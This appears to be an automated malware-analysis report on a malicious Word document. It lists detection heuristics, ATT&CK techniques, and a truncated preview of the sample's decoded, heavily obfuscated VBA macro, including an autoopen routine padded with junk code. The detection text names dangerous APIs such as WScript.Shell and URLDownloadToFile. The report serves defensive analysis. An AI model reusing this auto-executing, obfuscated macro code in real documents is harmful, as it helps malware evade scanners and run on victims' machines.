MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro uses obfuscation techniques, including splitting keywords, to hide its malicious intent. It also utilizes the GetObject function and an autoopen macro, indicating an attempt to execute code upon opening. The ClamAV detection and heuristic firings strongly suggest this is a downloader.
Heuristics 8
-
ClamAV: Doc.Downloader.00536d-6944297-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6944297-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28550 bytes |
SHA-256: b4cad42e6ffc25584ff0726c421fa0c82ea1c6cbec98796cb44d3ae3dff9441a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "lQ4DxX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "joAXZA"
Attribute VB_Base = "0{6CCF1993-C999-4F57-B273-ED66A87AD96E}{5092B10A-12CB-49F0-8E07-C503D9BA76D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "nQAAQ_"
Attribute VB_Base = "0{15E255D2-EF37-42AA-98CC-BF757E6A8AC9}{2F84DC7F-1C21-4B22-96B5-F501EE8894E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "skAAA44"
Sub autoopen()
If mBB_UkB = FABAAUxC Then
NUBkAQxw = 40652062 * wAAXQwC
ElseIf SAxX_AQU = hAwQGC Then
Set aUUoQAA = V4_XDQ
ElseIf GUAAAw = mADADQ Then
oA_x_DBo = HQAkB1 / cwwQQZk * FCUAAD + Sqr(h1woQkA)
ElseIf DAZ4QDA = BAcGcA Then
XCCZZA = 27339839
End If
If zGCAA_ = WC4GABx Then
IBCAcA = 427739662 * DZ41AB
ElseIf wZcBkZAw = wXZAGc_A Then
Set oxAZ_cUw = KQAG4Q
ElseIf CDwx4Q = iABAAZ Then
KCA_Uk = WXUAABA / NXAZQUA * RGUXAU + Sqr(YA1cAAA)
ElseIf VAAQAxU = QoUAQQA Then
WkAoxkoD = 73589769
End If
If YUAUGkAB = fZQU_CUQ Then
oUAABUA = 312282061 * UZAU_C
ElseIf ZUAGUGw = iwkU1ZD Then
Set hGBCACDA = iDwQBB
ElseIf VDcDUcD = TBDxQ_ Then
XUQAwA = FxcDG1 / ACBAB1 * iBcA1kA + Sqr(NUAAAXQ)
ElseIf PCUkUDGA = hoAABCA Then
AxccDAA = 907020580
End If
nXQ4AD
If HxBAAAw = XQCDAw Then
RAcQCc = 583652363 * FBGUUoUG
ElseIf Q4_AAA = vQBAoADD Then
Set vXAcCU = RDAoBG4
ElseIf UBUAkB = RoGUZAAA Then
YAAGQwkD = BcABCocw / pAAA4BxC * kAAAAA + Sqr(EZAxkQAD)
ElseIf mADkD1Ck = CCXXAU Then
hAGACAkA = 767101096
End If
If wDxAAAw = E_QAABB Then
rCABAAC = 832649815 * GAw1oD
ElseIf Z1o4G1DZ = LA44AA Then
Set cUCwoA = pxoXGc
ElseIf EDZwAZ = cA4xQZx Then
oBBBAA = dZAAAQA1 / CAoBAC1 * lGB1xA + Sqr(VXABCC1U)
ElseIf A_wDAxc = QCQAQB Then
NxwAUAAB = 76026590
End If
If cUZAQA1 = o1A1Qcw1 Then
V__AXG = 739424599 * TAAoBAXA
ElseIf JDXCABkG = zQGUBQxD Then
Set zAwAQA = MABDBQQ
ElseIf aXDAxA = iGAAAkkA Then
TAAXABAU = tAAAA1 / GwcAUQXc * KA_AAA + Sqr(YABQA4A)
ElseIf jZxQA4 = rAA_wc Then
iXAAwkUw = 185960431
End If
End Sub
Attribute VB_Name = "jAkXXX"
Function nXQ4AD()
On Error Resume Next
If TDCABBA = RZUUZD4D Then
HZk1cAA = 111488983 * zxDwAX
ElseIf lDkQZxU = i1BxABcU Then
Set DcA1_G = RAAQ1AwG
ElseIf SckAUA = JwAADZAC Then
PDGDUDA = HxkQDAG / GA1AUG * AoQGUDB + Sqr(jAA1ABB)
ElseIf pAAQAUX = WDZDx4DA Then
tAA1Axk = 8828071
End If
If GUcAQ1QX = qok1ABo Then
IcXCAxAk = 433040459 * nDAxDAw
ElseIf nGowACQx = q4wZcQCQ Then
Set ZADw_AU = vD4kUA
ElseIf zQGwxc = tQ4BAA Then
VU4BGAUw = LQw_AD_G / hk_XQD4w * q_UUUc + Sqr(WwD_ZDQA)
ElseIf lAD4_UA = Wx4AXD_D Then
bQBAQw = 763825975
End If
If jAZQkx4 = PcGDkAD Then
NUBcAAk = 110199077 * MAcX4QQ
ElseIf bBkUGA = T_ABZQQZ Then
Set jAAGxAkA = pAADAA
ElseIf HAoDQCAG = nAAGABAQ Then
dZAx_AcA = nBAAD_ / GQAAoX * ukAwXAQ + Sqr(iABoACA)
ElseIf JXUAADZ = jcw4DkA Then
DUDZxXAU = 418060932
End If
If 7304 < 17404 Then
VABXAA = vbFalse
If fGBDAcAo = Vw_BAA Then
YAwA_XQA = 288468827 * F4AAAkwX
ElseIf uAAwXAkQ = nZXAwGQ Then
Set qXGUAx_ = BAwAwk
ElseIf wB1AUU = J4AoAQA Then
UZwGAwUU = WwZAA4CU / MAABCAAx * NAw_BAD + Sqr(SB_AGUw)
ElseIf U1oDDkB = iU4QUw4_ Then
CAUw1A = 877920435
End If
If dUA4CUD = r1UAAZ_A Then
wBADAAUA = 350890717 * jQAAZAQA
ElseIf zxQABU = rcAGBQ4 Then
Set lXBCcUA = ZAQAAAQQ
ElseIf kBDUAAZU = jUAXBAAD Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.